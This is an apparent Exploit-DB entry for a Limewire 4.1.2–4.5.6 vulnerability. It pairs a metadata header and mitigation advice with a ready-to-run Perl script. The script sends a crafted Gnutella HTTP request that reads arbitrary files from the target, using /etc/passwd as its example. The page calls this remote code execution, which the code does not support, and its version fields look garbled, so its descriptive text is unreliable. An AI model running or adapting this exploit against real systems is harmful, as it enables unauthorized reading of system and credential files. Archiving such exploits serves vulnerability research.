Limewire 4.1.2 - 4.5.6 Remote Exploit

vendor:

Limewire

by:

lammat

9.3

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: Limewire

Affected Version From: 4.1.2002

Affected Version To: 4.5.2006

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2005

Limewire 4.1.2 – 4.5.6 Remote Exploit

This exploit allows an attacker to remotely execute arbitrary code on a system running Limewire versions 4.1.2 to 4.5.6. The exploit takes advantage of a vulnerability in the software's handling of certain HTTP requests. By sending a specially crafted request, an attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update Limewire to the latest version or discontinue its use. Additionally, implementing proper network security measures, such as firewalls and intrusion detection systems, can help detect and prevent such exploits.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#Limewire 4.1.2 - 4.5.6 remote and fucking lame exploit	    *	
#                written by lammat 			   *
#              http://grpower.ath.cx		          *
#		lammat@iname.com			 *						
#	      Discovered by Kevin Walsh                 *	

use IO::Socket;

$host = @ARGV[0];
$file = @ARGV[1];

unless (@ARGV == 2) {
print "usage: $0 host file\n";
print "E.g: $0 10.0.0.2 /etc/passwd\n";
exit
}

@req = "GET /gnutella/res//$file HTTP/1.1\n
User-Agent: I-AM-AN-ATTACKER/1.0\n
Host: 0.0.0.0:0\n
Accept: */*\n
Connection: Keep-Alive";

print "[+] checking if host exists...\n";
$string = inet_aton($host) || die "[-] Host does not exist...\n";

print "[+] $host exists...connecting...\n";
$web = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "6346",
)
or die "cannot connect to the $host";
if ($web)
{
print "[+] Connected...sending the request...\n";

print $web "@req";


while ( <$web> )
{ print }
close $web;
}

# milw0rm.com [2005-03-14]